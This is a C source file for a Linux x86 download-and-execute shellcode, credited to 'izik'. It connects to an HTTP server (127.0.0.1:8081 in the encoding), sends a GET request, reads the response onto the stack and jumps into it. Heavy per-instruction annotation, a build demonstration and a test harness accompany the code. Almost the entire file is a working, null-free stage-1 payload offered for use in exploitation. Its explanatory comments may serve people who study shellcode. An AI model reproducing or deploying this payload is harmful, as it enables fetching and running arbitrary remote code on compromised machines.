/* (linux/x86) HTTP/1.x GET, Downloads and JMP - 68 bytes+
*
 * This shellcode lets you download raw binary code straight off a standard HTTP server
 * and execute it. The downloaded code is written to, and executed from, the stack, so the
 * target process needs an executable stack (no NX/W^X enforcement) for the final jump to work.
*
* <DEMONSTRATION>:
*
 * > Start by creating a very simple shellcode that will be downloaded and executed.
*
* root@magicbox:/tmp# cat foobar.s
* .section .text
* .global _start
* _start:
*
* movl $0x4, %eax
* movl $0x1, %ebx
*
* call _doint
* .ascii "Hello World!"
* .byte 0xa
* _doint:
* popl %ecx
* movl $0xd, %edx
* int $0x80
*
* movl $0x1, %eax
* int $0x80
*
* # Reverse CALL
* call _start
*
 * > The only requirement on the downloaded shellcode is that it ends with a backward
 * CALL to its own entry point. Because this shellcode does not parse the HTTP headers, it
 * has no way of knowing where the downloaded code begins or ends; it therefore relies on the
 * downloaded code to supply that itself, via a trailing 5-byte CALL that the loader jumps into.
*
* > Compile the given shellcode
*
* root@magicbox:/tmp# as -o foobar.o foobar.s
* root@magicbox:/tmp# ld -o foobar foobar.o
*
* > Convert this file into a raw binary (headerless, formatless)
*
* root@magicbox:/tmp# objcopy -O binary foobar foobar.bin
*
 * > Host this file on some HTTP server (I have used Apache/1.3.34)
*
* > Use gen_httpreq.c to generate a URL request (e.g. /foobar.bin)
*
* > Paste the gen_httpreq.c output, into this shellcode at the marked place.
*
* > Compile this shellcode w/ the gen_httpreq output in it.
*
* > Execute this shellcode
*
* root@magicbox:/tmp# gcc -o http-download-jmp http-download-jmp.c
* root@magicbox:/tmp# ./http-download-jmp
* Hello World!
* root@magicbox:/tmp#
*
* <LINKS/UTILITIES>:
*
* gen_httpreq.c, generates a HTTP GET request for this shellcode
* > http://www.tty64.org/shellcode/utilities/gen_httpreq.c
*
* - izik <[email protected]>
*/
/*
 * Stage-1 downloader (linux/x86, int 0x80 ABI).
 *
 * Flow as encoded below: socket(AF_INET, SOCK_STREAM, 0) -> connect() to
 * 127.0.0.1:8081 -> write() the HTTP request that the gen_httpreq.c paste
 * leaves on the stack -> read() the whole response one byte at a time onto
 * the stack until EOF -> jmp into the trailing 5-byte "call" of the payload.
 *
 * Observations a reviewer should keep in mind:
 *  - The syscall number is loaded with "mov $..,%al", so it relies on the
 *    upper 24 bits of eax being zero, i.e. on the previous syscall having
 *    succeeded (a -errno return would yield a bogus syscall number). There
 *    is no error checking anywhere.
 *  - After "inc %ebx" the value 3 serves both as SYS_CONNECT and, later, as
 *    the fd for write()/read(): the socket is assumed to be fd 3 (fds 0-2
 *    already open). This also assumes the pasted gen_httpreq code leaves
 *    ebx untouched -- confirm against that generator's output.
 *  - The encoding contains no 0x00 byte; immediates are built with
 *    push/pop, NOT and BSWAP instead of plain 32-bit moves for that reason.
 */
char shellcode[] =
"\x6a\x66" // push $0x66         ; eax = 102 = socketcall
"\x58" // pop %eax
"\x99" // cltd               ; edx = 0 (eax is positive) -> protocol = 0
"\x6a\x01" // push $0x1          ; ebx = 1 = SYS_SOCKET
"\x5b" // pop %ebx
"\x52" // push %edx          ; args[2] protocol = 0
"\x53" // push %ebx          ; args[1] type = 1 = SOCK_STREAM
"\x6a\x02" // push $0x2          ; args[0] domain = 2 = AF_INET
"\x89\xe1" // mov %esp,%ecx      ; ecx = &args (reused below as &sockaddr_in)
"\xcd\x80" // int $0x80          ; eax = socket(AF_INET, SOCK_STREAM, 0)
"\x5b" // pop %ebx           ; ebx = 2 (the AF_INET slot) -> sin_family
"\x5d" // pop %ebp           ; ebp = 1; only its low 16 bits are replaced below
//
"\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi
// (0xfeffff80 = ~0x0100007f, i.e. 127.0.0.1 in network byte order, stored
//  inverted to avoid NUL bytes)
//
//
"\x66\xbd\x91\x1f" // mov $0x1f91,%bp
// (0x1f91 = 8081/tcp; ebp is now 0x00001f91)
//
//
// Alternative for port 80 (0x0050 contains a NUL, so it is stored inverted):
// "\x66\xbd\xaf\xff" // mov $0xffaf, %bp
// // (~0xffaf = 0x0050 = 80/tcp)
// "\x66\xf7\xd5" // not %bp
//
"\xf7\xd6" // not %esi           ; esi = 0x0100007f = 127.0.0.1 (bytes 7f 00 00 01)
"\x56" // push %esi          ; sin_addr (lands in the old args[1] slot)
"\x0f\xcd" // bswap %ebp         ; 0x00001f91 -> 0x911f0000: port in network order, high half
"\x09\xdd" // or %ebx,%ebp       ; | 2 -> 0x911f0002 = { sin_family = 2, sin_port = htons(8081) }
"\x55" // push %ebp          ; lands in the old args[0] slot, so ecx == &sockaddr_in
"\x43" // inc %ebx           ; ebx = 3 = SYS_CONNECT (and, later, the assumed socket fd)
"\x6a\x10" // push $0x10         ; args[2] addrlen = 16
"\x51" // push %ecx          ; args[1] = &sockaddr_in (see the two pushes above)
"\x50" // push %eax          ; args[0] = sockfd returned by socket()
"\xb0\x66" // mov $0x66,%al      ; eax = socketcall (assumes eax's upper bytes are zero)
"\x89\xe1" // mov %esp,%ecx      ; ecx = &args
"\xcd\x80" // int $0x80          ; connect(sockfd, &sockaddr_in, 16); eax = 0 on success
//
// <paste here the code, that gen_httpreq.c outputs!>
// (expected to leave the HTTP request at the top of the stack and its
//  length in edx for the write() below -- verify against gen_httpreq.c)
//
"\x89\xe1" // mov %esp,%ecx      ; ecx = &request, also the start of the receive buffer
"\xb0\x04" // mov $0x4,%al       ; eax = write (relies on connect() having returned 0)
"\xcd\x80" // int $0x80          ; write(3, request, edx)
//
// <_recv_http_request>:
// Receive loop: one byte per read() straight onto the stack, growing
// towards higher addresses, i.e. over the request bytes and then over
// whatever lies above esp (older frames). There is no upper bound: a
// response larger than the stack space above esp would run off the end
// of the mapping. The loop exits only when read() returns 0, so the
// server must close the connection after the response; a negative
// (error) return is also non-zero and keeps the loop spinning.
//
"\xb0\x03" // mov $0x3,%al       ; eax = read (eax was the small count from the last call)
"\x6a\x01" // push $0x1          ; edx = 1 byte per read()
"\x5a" // pop %edx
"\xcd\x80" // int $0x80          ; read(3, ecx, 1)
"\x41" // inc %ecx           ; advance the receive pointer (also once more after EOF)
"\x85\xc0" // test %eax,%eax
"\x75\xf4" // jne <_recv_http_request>   ; -12 bytes = back to "mov $0x3,%al"
"\x83\xe9\x06" // sub $0x6,%ecx      ; ecx = (end+1)-6 = end-5 = first byte of the payload's trailing 5-byte "call"
"\xff\xe1"; // jmp *%ecx          ; execute that call, which transfers control to the payload's _start
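/*
 * Test harness: transfers control to the bytes in shellcode[].
 *
 * The previous harness overwrote main()'s saved return address through
 * "(int *)&ret + 2" with "(int) shellcode". That depends on one specific
 * frame layout (breaks under a stack protector or a different spill
 * order), is undefined behavior, and truncates a pointer to int. Calling
 * through a function pointer gives the same transfer of control without
 * guessing at the frame.
 *
 * NOTE(review): shellcode[] lives in writable data and the downloaded
 * payload runs on the stack, so both have to be executable for this to
 * work at all; on a current toolchain that presumably means a 32-bit
 * build with an executable stack (e.g. -m32 -z execstack) -- confirm for
 * the target system. The shellcode never returns on success.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    void (*entry)(void) = (void (*)(void))shellcode;
    entry();

    return 0;
}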